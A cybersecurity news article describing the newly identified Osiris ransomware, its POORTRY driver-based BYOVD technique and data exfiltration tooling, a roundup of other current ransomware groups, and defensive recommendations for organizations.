Cybersecurity researchers have uncovered a new ransomware strain called Osiris, which targeted a major food service franchise operator in Southeast Asia in November 2025. The attack demonstrates advanced techniques, including the use of a malicious driver named POORTRY in a bring your own vulnerable driver (BYOVD) attack to disable security software.
Osiris: A Brand-New Ransomware Strain
Osiris is a completely new ransomware family, unrelated to the variant that appeared in December 2016 as part of the Locky ransomware lineage. Researchers from Symantec and Carbon Black noted that the developers remain unidentified, and it is unclear if Osiris operates as a ransomware-as-a-service (RaaS).
Some evidence links the attackers to the INC ransomware (aka Warble) campaigns, based on similarities in tooling and tactics. The attackers exfiltrated data to Wasabi cloud buckets and reused a version of Mimikatz (kaz.exe) previously associated with INC ransomware operations.
Attack Techniques and Payload Behavior
Osiris uses a hybrid encryption scheme, generating a unique key for each file. It is highly configurable, capable of:
- Stopping services and terminating processes
- Specifying folders and file extensions for encryption
- Dropping ransom notes
By default, Osiris targets processes and services related to Microsoft Office, Exchange, Mozilla Firefox, WordPad, Notepad, Volume Shadow Copy, and Veeam, among others.
Data Exfiltration and Dual-Use Tools
The attack chain began with data exfiltration using Rclone to Wasabi cloud storage. Dual-use tools such as Netscan, Netexec, and MeshAgent, along with a customized version of Rustdesk remote desktop software, were used to establish control and facilitate ransomware deployment.
POORTRY Driver and BYOVD Attack
The POORTRY driver is unique compared to typical BYOVD attacks. Instead of exploiting a legitimate vulnerable driver, POORTRY is a bespoke driver designed to:
- Elevate privileges
- Terminate security software
Additionally, KillAV was deployed to disable security processes, and RDP was enabled for remote access.
Broader Ransomware Landscape
Ransomware remains a major enterprise threat, with the ecosystem constantly evolving:
- Akira has leveraged vulnerable Throttlestop drivers, Windows CardSpace UI Agent, and Microsoft Media Foundation to sideload the Bumblebee loader. They also exploited SonicWall SSL VPNs and ClickFix-style CAPTCHAs to deliver .NET RATs (SectopRAT).
- LockBit continues to evolve with LockBit 5.0, including a two-stage deployment model and targeting multiple operating systems.
- Sicarii, a new RaaS, claims one victim in late 2025 but shows signs of potential false-flag activity due to Russian-language use despite self-identifying as Israeli/Jewish.
- Storm-2603 (CL-CRI-1040 / Gold Salem) has used Velociraptor and BYOVD attacks with drivers like rsndispot.sys and kl.sys to deploy Warlock, LockBit, and Babuk ransomware.
- Makop has targeted India, Brazil, and Germany using exposed RDPs, dual-use tools, BYOVD drivers, and GuLoader to stage and deliver ransomware.
- Obscura contains an encryption flaw leaving files over 1GB unrecoverable.
- 01flip, written in Rust, targets Windows and Linux and exploits known CVEs to infiltrate networks.
Recommendations for Organizations
To defend against targeted ransomware attacks like Osiris:
- Monitor dual-use tools for unusual activity
- Restrict and secure RDP access, enforce multi-factor authentication (2FA)
- Use application allowlisting where possible
- Maintain offline or off-site backups
Symantec and Carbon Black emphasize that while traditional encrypting ransomware remains prevalent, encryptionless attacks and hybrid extortion tactics are expanding the threat ecosystem, making ransomware only one component of a broader cyber-extortion risk.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
